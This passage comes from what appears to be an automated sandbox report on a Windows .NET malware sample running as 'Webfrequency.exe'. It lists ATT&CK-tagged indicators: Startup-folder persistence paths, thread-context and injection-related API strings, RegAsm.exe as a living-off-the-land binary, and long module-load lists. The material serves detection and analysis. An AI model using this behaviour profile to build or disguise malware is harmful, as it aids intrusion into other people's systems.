string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00002568-00000C28-1906558649]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00002568-00000C28-1906670331]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00002568-00000C28-1907046145]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00002568-00000C28-1907102069]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00002568-00000C28-1907208990]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00002568-00000C28-1908230653]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00002568-00000C28-1908309945]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll\" [Source: 00000000-00002568-00000C28-1908374419]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll\" [Source: 00000000-00002568-00000C28-1908457316]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" [Source: 00000000-00002568-00000C28-1908636094]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00002568-00000C28-1908815343]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll\" [Source: 00000000-00002568-00000C28-1908892301]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll\" [Source: 00000000-00002568-00000C28-1908959981]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00002568-00000C28-1909014942]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00002568-00000C28-1910219755]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" [Source: 00000000-00002568-00000C28-1923364891]\n Observed system executable string:\"%WINDIR%\\system32\\apphelp.dll\" [Source: 00000000-00001812-0000018F-32239031]\n Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00001812-00000C60-1927076391]\n Observed system executable string:\"%WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\" [Source: 00000000-00001812-00000C28-1945594457]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" [Source: 00000000-00001812-00000C28-1959022847]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll\" [Source: 00000000-00000352-00000C28-1963232740]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll\" [Source: 00000000-00000352-00000C28-1963282188]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll\" [Source: 00000000-00000352-00000C28-1963360438]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00002568.00000001.186418.00320000.00000004.mdmp\n \":\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00002568.00000001.186418.00320000.00000004.mdmp\n \"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00002568.00000001.186418.00320000.00000004.mdmp\n \":\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00002568.00000001.186418.00320000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"wShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" [Source: 00000000-00001812-00000C43-77152460157]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetObject\"; Source: \"00000000-00001812.00000001.188519.02C70000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibrary\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateDirectory\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"AddDllDirectory\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"DefWindowProcW\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API (Indicator: \"DefWindowProcA\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"_GetThreadContext\" (Indicator: \"GetThreadContext\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"_ResumeThread\" (Indicator: \"ResumeThread\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"_SetThreadContext\" (Indicator: \"SetThreadContext\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72200000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"KERNEL32\" at base 75eb0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"ADVAPI32.DLL\" at base 760e0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c610000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"SHLWAPI.DLL\" at base 77580000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"VERSION.DLL\" at base 75010000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 65100000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"USER32.DLL\" at base 76010000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"MSCOREE.DLL\" at base 6c6a0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"PSAPI.DLL\" at base 77700000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"RPCRT4.DLL\" at base 77bc0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"KERNEL32.DLL\" at base 75eb0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63cf0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"OLE32.DLL\" at base 76220000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a70000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746b0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 730d0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 69450000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 63290000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 68f00000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 62420000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"UXTHEME.DLL\" at base 746b0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 61c00000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68df0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 61480000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 707d0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"NTDLL.DLL\" at base 77c70000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"SHELL32.DLL\" at base 76910000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77560000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"PROFAPI.DLL\" at base 75b90000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"BCRYPT.DLL\" at base 75690000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"CRYPTSP.DLL\" at base 75580000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75310000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"IMM32.DLL\" at base 76460000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"COMCTL32.DLL\" at base 727c0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"GDI32.DLL\" at base 75fc0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"AMSI.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77560000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b10000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"OLEAUT32.DLL\" at base 77dc0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"PROPSYS.DLL\" at base 74820000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"COMCTL32.DLL\" at base 74a70000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"CLBCATQ.DLL\" at base 76190000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74820000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"NTMARTA.DLL\" at base 74fe0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"APPHELP.DLL\" at base 75a20000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 70890000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76910000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75eb0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"SETUPAPI.DLL\" at base 76720000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ce0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 779c0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"SECUR32.DLL\" at base 758a0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75cc0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6ffc0000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a20000\n \"Webfrequency.exe\" loaded module \"GDI32.DLL\" at base 75fc0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76460000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72200000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"Webfrequency.exe\" loaded module \"KERNEL32\" at base 75eb0000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d120000\n \"Webfrequency.exe\" loaded module \"ADVAPI32.DLL\" at base 760e0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c610000\n \"Webfrequency.exe\" loaded module \"SHLWAPI.DLL\" at base 77580000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"VERSION.DLL\" at base 75010000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64950000\n \"Webfrequency.exe\" loaded module \"USER32.DLL\" at base 76010000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"MSCOREE.DLL\" at base 6c6a0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"PSAPI.DLL\" at base 77700000\n \"Webfrequency.exe\" loaded module \"RPCRT4.DLL\" at base 77bc0000\n \"Webfrequency.exe\" loaded module \"KERNEL32.DLL\" at base 75eb0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63540000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"OLE32.DLL\" at base 76220000\n \"Webfrequency.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a70000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746b0000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 73160000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 69020000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62ae0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 68e70000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 61c70000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"UXTHEME.DLL\" at base 746b0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 61450000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68d60000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 65130000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 73140000\n \"Webfrequency.exe\" loaded module \"NTDLL.DLL\" at base 77c70000\n \"Webfrequency.exe\" loaded module \"SHELL32.DLL\" at base 76910000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77560000\n \"Webfrequency.exe\" loaded module \"PROFAPI.DLL\" at base 75b90000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"BCRYPT.DLL\" at base 75690000\n \"Webfrequency.exe\" loaded module \"CRYPTSP.DLL\" at base 75580000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75310000\n \"Webfrequency.exe\" loaded module \"IMM32.DLL\" at base 76460000\n \"Webfrequency.exe\" loaded module \"COMCTL32.DLL\" at base 727c0000\n \"Webfrequency.exe\" loaded module \"AMSI.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77560000\n \"Webfrequency.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b10000\n \"Webfrequency.exe\" loaded module \"OLEAUT32.DLL\" at base 77dc0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"Webfrequency.exe\" loaded module \"GDIPLUS.DLL\" at base 74510000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 74510000\n \"Webfrequency.exe\" loaded module \"WINDOWSCODECS.DLL\" at base 73f30000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a20000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLEAUT32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72200000\n \"RegAsm.exe\" loaded module 